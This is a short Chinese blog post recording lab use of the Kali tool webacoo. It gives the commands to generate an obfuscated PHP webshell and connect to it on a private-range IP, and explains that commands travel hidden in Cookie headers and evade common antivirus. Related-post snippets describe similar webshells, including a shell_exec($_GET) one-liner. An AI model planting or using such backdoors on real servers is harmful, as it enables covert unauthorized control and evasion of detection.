2018-11-08 webacoo小试记录(kali)

最新推荐文章于 2024-03-15 09:41:27 发布
原创 最新推荐文章于 2024-03-15 09:41:27 发布 · 137 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过Cookie头传输编码通信内容的隐蔽方法,用于获取类终端的shell,且不易被一般杀软检测。文中详细解释了如何使用webacoo工具生成及连接加密混淆的一句话木马。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一. 简介:

获取的是类终端的shell。编码通信内容通过cookie头传输,隐蔽性较强。亲测不会被一般的杀软查杀,企业级的杀软没有测试。

参数:      查看帮助:webacoo -h

二. 使用记录:

webacoo -g -o webacoo.php      (创建加密混淆的一句话木马,-g参数生成后门代码,-o参数输出为一个文件。)​

 
12321111-f181bd8d841a9306
 

至于如何上传到服务器本地不在此赘述了。

webacoo -t -u http://192.168.56.101/webacoo.php     (连接一句话木马,-t参数指定进行客户端的连接,-u参数指定目标URL。)

 
12321111-8e1b78a59c380d39
 

##抓包分析如何通过cookie头传指令,手动触发流量  【cm/cn/cp】

 
12321111-b42a6c76d9a5413d
 
关于Kali的两个Webshell(Webacoo和Weevely)的学习笔记
Mi1k7ea
03-15 6568
Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。 Web Backdoor Cookie(Webacoo): Webacoo的编码通信内容都是通过cookie头传输,隐蔽性强。 其Cookie头中的三个变量: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 直接在终端输
2018-11 webacoo小试记录kali
昨天今天下雨天的博客
11-06 855
一. 简介: 获取的是类终端的shell。编码通信内容通过cookie头传输,隐蔽性较强。亲测不会被一般的杀软查杀,企业级的杀软没有测试。 参数: 查看帮助:webacoo -h 二. 使用记录webacoo -g -o webacoo.php (创建加密混淆的一句话木马,-g参数生成后门代码,-o参数输出为一个文件。) webacoo -t -u http://...
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 1085
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
Web后门工具WeBaCoo
weixin_33701294的博客
09-11 222
2019独角兽企业重金招聘Python工程师标准>>> ...
webacoo
qq_43776408的博客
09-29 524
WeBaCoo是一款隐蔽的脚本类Web后门工具,设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测),WebBaCoo 使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。 /////////////////////////////////// 生成服务端代码: webacoo -g -...
kali-linux-2018.4-amd64 操作系统
12-19
kali-linux-2018.4-amd64 操作系统 网盘下载地址 确保资源可用
kali-linux-2018.3-amd64.iso
02-22
kali-linux-2018.3-amd64.iso
kali-linux-2018.2-vm-i386.ova
11-23
Kali linux 镜像文件下载即用,不用安装。适合U盘上面随时携带。百度云链接下载 kali-linux-2018.2-vm-i386.ova 默认密码:toor
kali-linux-08-06-2019.rar
06-03
kali-linux的最小集合安装包,他只包含了必要的组件,轻巧,简约。适合自定义安装。kali-linux,安全工作者和黑客的必备工具系统。如果你想成为网络安全工作者,或是想学习黑客知识。它将是你的好伙伴。
kali-linux-wireless-pentest_kali使用指南_productg6t_kali_kali-linux-
10-01
kali Linux详细指南,后续在更新
webacoo的webshell
03-04
webacoo的webshell,一个轻量级的phpshell,比较好用
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 703
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
WeBaCoo - 基于Web的协作编程环境
最新发布
gitblog_00090的博客
03-15 482
WeBaCoo - 基于Web的协作编程环境 WeBaCooWeb Backdoor Cookie Script-Kit项目地址:https://gitcode.com/gh_mirrors/we/WeBaCoo 是一个基于Web的在线协作编程环境,它允许多个开发者在同一个项目中进行实时协作。无需安装任何软件,只需通过浏览器即可访问并开始工作。 能用来做什么? 实时协同编程:使用 WeBaCo...
webshell管理-WeBaCoo和Weevely
weixin_41082546的博客
03-19 272
WeBaCoo (Web Backdoor Cookie) 简介 类终端的shell,只针对 PHP 编码通信内容通过 cookie 头传输,隐蔽性较强 Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~ cm:bash64 编码之后的命令 cn:服务器用于返回数据的 cookie 头的名 cp:返回信息定界符 生成服务器端 webacoo -g -o w...
【安全牛学习笔记】WEBSHELL
edu_aqniu的博客
09-30 1273
WEBSHELL                                           中国菜刀: http://www.maicaidao.co/                       可能被IDS、AV、WAF、扫描器软件发现查杀       WeBaCoo(WEB backdoor Cookie)                   
安装完kali的后的一些配置(教程集合)
cynthrial的博客
09-26 1526
安装完kali后的一些配置(教程集合) 替换更新源 + 安装中文输入法 https://blog.csdn.net/anjingshen/article/details/75909366 设置kali的快捷键 现在用的kali版本是rolling,基于debian 8(Jessie) 打开终端每次都去点就很不爽 在 设置→设备→键盘 中新建一个快捷键就好 名称:开启终端 命令:gnome-te...
kali webshell
含笑
05-06 2066
WeBaCoo (Web Backdoor Cookie) script-kit是一个小巧的、隐蔽的php后门,它提供了一个可以连接远程web服务器并执行php代码的终端。WeBaCoo使用HTTP响应头传送命令结果,shell命令经base64编码后隐藏在Cookie头中。 首先先生成一下文件; 下面把文件复制到服务端。 然后再在服务器端把文件移动到www目录下; 连接,就
渗透利器Weevely之奇淫技巧篇
qk的专栏
10-26 5299
Weevely简介 Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以在任何安装过python的系统上使用。本文介绍的不是它最基本的功能,而是在渗透测试过程中使用它的奇淫技巧。 安装运行 Linux:(python2.7版本的Debian/Ubuntu) $sudo apt-get install g++
Kali Linux渗透测试 102 利用工具-Webshell
kevinhanser
03-26 3323
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. Webshell 演示 在被攻击者新建 webshell 文件root@metasploitable:/var/www# cat test.php <?php echo shell_exec($_GE
Termux环境下的Kali-Chroot引导工具:boot-nethunter
在此上下文中,Kali-Chroot指的是将Kali Linux操作系统环境安装到Termux环境中,并可以在这个新环境中独立运行,不干扰原始Android系统的状态。 - **与Nethunter一起安装**: Nethunter是一个渗透测试工具包,专门为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值